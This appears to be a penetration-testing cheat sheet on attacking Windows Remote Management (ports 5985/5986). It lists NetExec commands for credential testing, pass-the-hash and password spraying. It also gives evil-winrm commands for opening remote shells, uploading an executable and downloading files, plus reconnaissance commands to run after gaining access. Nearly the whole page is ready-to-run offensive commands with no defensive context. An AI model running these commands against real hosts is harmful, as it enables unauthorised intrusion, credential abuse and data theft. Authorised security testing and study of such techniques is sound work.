Skip to main content

5985, 5986 win rm

WinRM Enumeration (5985, 5986)
#

Test WinRM with NetExec
#

netexec winrm $IP -u administrator -p password

Test WinRM with a hash
#

netexec winrm $IP -u administrator -H <ntlm_hash>

Connect with evil-winrm
#

evil-winrm -i $IP -u administrator -p password
evil-winrm -i $IP -u administrator -H <ntlm_hash>

Connect with evil-winrm over SSL
#

evil-winrm -i $IP -u administrator -p password -S

Password spray with NetExec
#

netexec winrm $IP -u users.txt -p 'Password123!' --continue-on-success

Upload file with evil-winrm
#

evil-winrm> upload /local/path/file.exe C:\temp\file.exe

Download file with evil-winrm
#

evil-winrm> download C:\temp\file.txt /local/path/file.txt

Initial commands after access
#

whoami /all
hostname
ipconfig /all
net user
net localgroup administrators